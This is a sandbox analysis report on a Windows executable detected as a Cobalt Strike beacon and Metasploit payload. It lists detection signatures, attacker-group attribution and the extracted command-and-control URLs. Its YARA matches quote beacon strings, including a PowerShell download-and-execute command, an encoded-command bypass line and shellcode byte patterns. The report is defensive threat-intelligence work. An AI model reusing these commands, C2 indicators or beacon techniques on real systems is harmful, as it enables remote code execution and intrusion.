Edit tour

Windows Analysis Report
THsSNYblMw.exe

Overview

General Information

Sample name:	THsSNYblMw.exe renamed because original name is a hash value
Original sample name:	16c39b54b46a69ca6950ffa93b7dda3f.exe
Analysis ID:	1587089
MD5:	16c39b54b46a69ca6950ffa93b7dda3f
SHA1:	1e34c89d60c9a0fdd55d5705f4e793ea11b20427
SHA256:	ef75893bff5dea81a18ba2927a608c22eefa5344042076a43cff2932bacd5787
Tags:	CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected CobaltStrike

Yara detected Metasploit Payload

Yara detected Powershell download and execute

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Uses known network protocols on non-standard ports

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

THsSNYblMw.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\THsSNYblMw.exe" MD5: 16C39B54B46A69CA6950FFA93B7DDA3F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://7.121.190.121:81/aGDq", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/aGDq"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2efea:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f062:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7cc:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2fafe:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fa90:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fafe:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f0c5:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f256:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f10b:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f149:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2fb48:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f3b6:$a11: Could not open service control manager on %s: %d 0x2f8e8:$a12: %d is an x64 process (can't inject x86 content) 0x2f918:$a13: %d is an x86 process (can't inject x64 content) 0x2fc39:$a14: Failed to impersonate logged on user %d (%u) 0x2f8a1:$a15: could not create remote thread in %d: %d 0x2f17f:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f84f:$a17: could not write to process memory: %d 0x2f3e7:$a18: Could not create service %s on %s: %d 0x2f470:$a19: Could not delete service %s on %s: %d 0x2f2d0:$a20: Could not open process token: %d (%u)
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1ad3b:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3e3c2:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f81:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e168:$loader_export: ReflectiveLoader 0x2efa7:$exportname: beacon.dll
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2fb48:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f918:$x2: %d is an x86 process (can't inject x64 content) 0x2fafe:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fbe2:$x4: Failed to impersonate token from %d (%u) 0x2fc39:$x5: Failed to impersonate logged on user %d (%u) 0x2efea:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp	Trojan_Raw_Generic_4	unknown	unknown	0x17f91:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 8B 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 C1 F1 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF 50 0x17335:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x30d6f:$a11: Could not open service control manager on %s: %d 0x312a1:$a12: %d is an x64 process (can't inject x86 content) 0x312d1:$a13: %d is an x86 process (can't inject x64 content) 0x315f2:$a14: Failed to impersonate logged on user %d (%u) 0x3125a:$a15: could not create remote thread in %d: %d 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31208:$a17: could not write to process memory: %d 0x30da0:$a18: Could not create service %s on %s: %d 0x30e29:$a19: Could not delete service %s on %s: %d 0x30c89:$a20: Could not open process token: %d (%u)
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17b3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x314b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x3: %d is an x86 process (can't inject x64 content) 0x30c89:$s1: Could not open process token: %d (%u) 0x309a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s4: Could not connect to pipe (%s): %d
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3fb21:$loader_export: ReflectiveLoader 0x30960:$exportname: beacon.dll
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x312a1:$x2: %d is an x64 process (can't inject x86 content) 0x315f2:$x3: Failed to impersonate logged on user %d (%u) 0x31501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x314b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x30c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31208:$s4: could not write to process memory: %d 0x309a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s6: Could not connect to pipe (%s): %d
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31970:$str1: %s (admin) 0x30960:$str2: beacon.dll
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x2: %d is an x86 process (can't inject x64 content) 0x314b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3159b:$x4: Failed to impersonate token from %d (%u) 0x315f2:$x5: Failed to impersonate logged on user %d (%u) 0x309a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3148f:$s1: %%IMPORT%% 0x30987:$s2: www6.%x%x.%s 0x3097b:$s3: cdn.%x%x.%s 0x30c03:$s4: api.%x%x.%s 0x31970:$s5: %s (admin) 0x30c72:$s6: could not spawn %s: %d 0x31533:$s7: Could not kill %d: %d 0x30d4c:$s8: Could not connect to pipe (%s): %d 0x30994:$s9: %s.1%x.%x%x.%s 0x309a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x30ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x30bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x30bdd:$s9: %s.1%08x%08x.%x%x.%s 0x30bf2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: THsSNYblMw.exe PID: 6864	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: THsSNYblMw.exe PID: 6864	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: THsSNYblMw.exe PID: 6864	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: THsSNYblMw.exe PID: 6864	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: THsSNYblMw.exe PID: 6864	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: THsSNYblMw.exe PID: 6864	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x1d398:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x29e39:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d410:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x29eb1:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1db75:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2a616:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x1de9d:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2a93e:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1de2f:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1de9d:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2a8d0:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2a93e:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1d473:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x29f14:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d604:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2a0a5:$a7: could not run command (w/ token) because of its length of %d bytes! 0x1d4b9:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x29f5a:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1d4f7:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x29f98:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x1dee7:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: THsSNYblMw.exe PID: 6864	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x224bc:$loader_export: ReflectiveLoader 0x224db:$loader_export: ReflectiveLoader 0x2f155:$loader_export: ReflectiveLoader 0x2f174:$loader_export: ReflectiveLoader 0x1d1d3:$exportname: beacon.dll 0x1d35c:$exportname: beacon.dll 0x29c72:$exportname: beacon.dll 0x29dfd:$exportname: beacon.dll
Process Memory Space: THsSNYblMw.exe PID: 6864	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x1dee7:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2a988:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x1dcc1:$x2: %d is an x86 process (can't inject x64 content) 0x2a762:$x2: %d is an x86 process (can't inject x64 content) 0x1de9d:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2a93e:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1df81:$x4: Failed to impersonate token from %d (%u) 0x2aa22:$x4: Failed to impersonate token from %d (%u) 0x1dfd8:$x5: Failed to impersonate logged on user %d (%u) 0x2aa79:$x5: Failed to impersonate logged on user %d (%u) 0x1d398:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x29e39:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.THsSNYblMw.exe.6a0000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.THsSNYblMw.exe.6a0000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.THsSNYblMw.exe.6a0000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2efa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f01b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f785:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2fab7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fa49:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2fab7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2f07e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f20f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2f0c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2fb01:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f36f:$a11: Could not open service control manager on %s: %d 0x2f8a1:$a12: %d is an x64 process (can't inject x86 content) 0x2f8d1:$a13: %d is an x86 process (can't inject x64 content) 0x2fbf2:$a14: Failed to impersonate logged on user %d (%u) 0x2f85a:$a15: could not create remote thread in %d: %d 0x2f138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f808:$a17: could not write to process memory: %d 0x2f3a0:$a18: Could not create service %s on %s: %d 0x2f429:$a19: Could not delete service %s on %s: %d 0x2f289:$a20: Could not open process token: %d (%u)
0.2.THsSNYblMw.exe.6a0000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1acf4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.THsSNYblMw.exe.6a0000.1.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x3e37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.THsSNYblMw.exe.6a0000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x16f3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.THsSNYblMw.exe.6a0000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2fab7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fb01:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f8d1:$x3: %d is an x86 process (can't inject x64 content) 0x2f289:$s1: Could not open process token: %d (%u) 0x2efa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f34c:$s4: Could not connect to pipe (%s): %d
0.2.THsSNYblMw.exe.6a0000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e121:$loader_export: ReflectiveLoader 0x2ef60:$exportname: beacon.dll
0.2.THsSNYblMw.exe.6a0000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2f8a1:$x2: %d is an x64 process (can't inject x86 content) 0x2fbf2:$x3: Failed to impersonate logged on user %d (%u) 0x2fb01:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fab7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f20f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2f808:$s4: could not write to process memory: %d 0x2efa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f34c:$s6: Could not connect to pipe (%s): %d
0.2.THsSNYblMw.exe.6a0000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2ff70:$str1: %s (admin) 0x2ef60:$str2: beacon.dll
0.2.THsSNYblMw.exe.6a0000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2fb01:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2f8d1:$x2: %d is an x86 process (can't inject x64 content) 0x2fab7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2fb9b:$x4: Failed to impersonate token from %d (%u) 0x2fbf2:$x5: Failed to impersonate logged on user %d (%u) 0x2efa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.THsSNYblMw.exe.6a0000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
